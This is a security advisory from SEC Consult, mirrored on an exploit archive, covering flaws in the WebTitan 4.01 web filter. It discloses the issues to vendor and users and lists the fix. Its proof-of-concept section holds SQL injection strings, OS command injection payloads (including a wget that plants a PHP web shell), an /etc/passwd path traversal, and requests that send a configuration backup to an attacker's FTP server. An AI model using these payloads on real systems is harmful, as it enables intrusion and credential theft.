WebTitan 4.01 (Build 68) – Multiple Vulnerabilities

• Exploit Database
• 20 阅读

• 作者： SEC Consult
  日期： 2014-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33699/

• SEC Consult Vulnerability Lab Security Advisory < 20140606-0 >
  =======================================================================
  title: Multiple critical vulnerabilities
  product: WebTitan
   vulnerable version: 4.01 (Build 68)
  fixed version: 4.04
   impact: critical
   homepage: http://www.webtitan.com
  found: 2014-04-07
   by: Robert Giruckas, Mindaugas Liudavicius
   SEC Consult Vulnerability Lab
   https://www.sec-consult.com
  =======================================================================
  
  Vendor description:
  -------------------
  "WebTitan offers ultimate protection from internet based threats and powerful
  web filtering functionalities to SMBs, Service Providers and Education sectors
  around the World."
  
  Source: http://www.webtitan.com/about-us/webtitan
  
  
  Business recommendation:
  ------------------------
  Multiple critical security vulnerabilities have been identified in the WebTitan
  system. Exploiting these vulnerabilities potential attackers could take control
  over the entire system.
  
  It is highly recommended by SEC Consult not to use this software until a
  thorough security review has been performed by security professionals and all
  identified issues have been resolved.
  
  
  Vulnerability overview/description:
  -----------------------------------
  1) SQL Injection
  A SQL injection vulnerability in the /categories-x.php script allows
  unauthenticated remote attackers to execute arbitrary SQL commands via the
  "sortkey" parameter.
  
  2) Remote command execution
  Multiple remote command execution vulnerabilities were detected in the
  WebTitan GUI. This security flaw exists due to lack of input validation. An
  authenticated attacker of any role (Administrator, Policy Manager, Report
  Manager) can execute arbitrary OS commands with the privileges of the web
  server.
  
  3) Path traversal
  The web GUI fails to properly filter user input passed to the logfile
  parameter. This leads to arbitrary file download by unauthenticated attackers.
  
  4) Unprotected Access
  The web GUI does not require authentication for certain PHP scripts. This
  security issue allows an unauthenticated remote attacker to download Webtitan
  configuration backup (including hashed user credentials) to the attacker's FTP
  server.
  
  
  Proof of concept:
  -----------------
  1) SQL Injection
  The manipulation of the "sortkey" parameter allows users to modify the
  original SQL query.
  
  GET /categories-x.php HTTP/1.1
  /categories-x.php?getcategories&sortkey=name) limit 1;--
  /categories-x.php?getcategories&sortkey=name) limit 5;--
  
  2) Remote command execution
  Due to improper user input validation it is possible to inject arbitrary OS
  commands using backticks ``. Some of the affected files do not sanitize any
  type of shell metacharacters, this allows an attacker to use more flexible OS
  commands. Tested and working payload for most scripts: `/usr/local/bin/wget
  http://<URL to shell script> -O /usr/blocker/www/graph/CPU/xshell.php`
  
  Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php,
  scheduledreports-x.php, reporting-x.php, network-x.php
  
  a. logs-x.php, vulnerable parameters: fname, logfile
  /logs-x.php?jaction=view&fname=webtitan.log;ls -la
  /logs-x.php POST Content: jaction=delete&logfile=<PAYLOAD>
  
  b. users-x.php, vulnerable parameters: ldapserver
   /users-x.php?findLdapDC=1&ldapserver=<PAYLOAD>
  
  c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost
  /support-x.php POST Content: jaction=ping&pinghost=<PAYLOAD>
  /support-x.php POST Content: jaction=ping&dighost=<PAYLOAD>
  /support-x.php POST Content: jaction=ping&tracehost=<PAYLOAD>
  
  d. time-x.php, vulnerable parameters: ntpserversList
   /time-x.php POST Content:
  jaction=ntpSync&timezone=Europe%2FLondon&ntp=1&ntpservers_entry=&date_month=4&date_day=8&date_year=2014&h_time=9&m_time=57&ntpserversList=<PAYLOAD>
  
  e. scheduledreports-x.php, vulnerable parameters: reportid
   /scheduledreports-x.php?runReport=1&reportid=<PAYLOAD>
  
  f. reporting-x.php, vulnerable parameter: delegated_admin
   /reporting-x.php POST Content:
  jaction=exportpdf&report=r_requests_user&period=period_today&uid=0&sourceip=0&urlid=0&groupid=0&categoryid=0&domain=&chart=pie&reporthtml=&reportid=1396860686&rowsperpage=10&currentpage=1&startdate=1396843200&enddate=1396929599&reportfilter=f_0&delegated_admin=admin';<PAYLOAD>'&gotopage=1
  
  g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols
   length), domain
   jaction=saveHostname&hostname=`root`
   jaction=saveDNS&domain=domain.com;<PAYLOAD>&dnsservers=192.168.0.1-:-
  
  
  3) Path traversal
  Due to missing input filtering in the logs-x.php script it is possible to
  download arbitrary files without any authentication:
  
  Vulnerable parameters: logfile
  Post Content: jaction=download&logfile=../../../etc/passwd
  
  4) Unprotected Access
  a. Since the script backup-x.php does not require authentication, remote
   attackers can initiate a backup of Webtitan configuration files to a remote
   FTP server by executing the following requests:
  
   /backup-x.php
   POST Content:
  jaction=saveFTP&jstatus=&schedule=1&frequency=daily&hour=16&minute=38&day_of_week=Mon&day_of_month=1&ftpserver=<IP>&ftplogin=<login>&ftppassword=<pw>&ftplocation=<path>
  
   Where <IP> is the remote FTP server IP, <login> - remote FTP server
   login, <password> - remote FTP, <path> - path where to store backup
  
   With the next request, an attacker can force the backup to be uploaded
   to the attacker's FTP server:
  
   /backup-x.php
   POST Content: jaction=exportNowtoFtp
  
   b. The autoconf-x.php, contentfiltering-x.php, license-x.php, msgs.php,
  reports-drill.php scripts can be reached by an unauthenticated user. The
  categories-x.php, urls-x.php can also be accessed by faking the HTTP User-Agent
  header, by setting it to "Shockwave Flash".
  
  
  Vulnerable / tested versions:
  -----------------------------
  The vulnerabilities have been verified to exist in the WebTitan VMware
  appliance ver. 4.0.1 (build 68). It is assumed that previous versions are
  affected too.
  
  
  Vendor contact timeline:
  ------------------------
  2014-04-17: Contacting vendor through info@webtitan.com and helpdesk@webtitan.com
  2014-04-23: Vendor is investigating the vulnerabilities
  2014-05-09: Vendor is testing security patches
  2014-06-03: Vendor releases the version 4.04 of WebTitan
  2014-06-06: SEC Consult releases a coordinated security advisory
  
  
  Solution:
  > -------- Update to the most recent version 4.04 of WebTitan. Workaround: ----------- Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF Mindaugas Liudavicius / @2014